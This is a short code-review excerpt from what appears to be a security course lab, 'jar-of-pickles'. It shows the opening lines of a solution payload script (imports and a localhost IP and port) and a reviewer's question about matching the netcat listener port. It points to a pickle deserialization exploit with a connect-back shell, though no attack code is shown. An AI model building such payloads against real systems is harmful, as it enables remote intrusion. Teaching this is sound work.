exotic-attacks/activities/jar-of-pickles/sol/payload.py

```diff
@@ -0,0 +1,18 @@
+import base64
+import os
+import pickle
+import requests
+
+IP = "127.0.0.1"
+PORT = 1234
```

Comment:
Any available port? Should be the same as the one in netcat? If yes, we should mention this.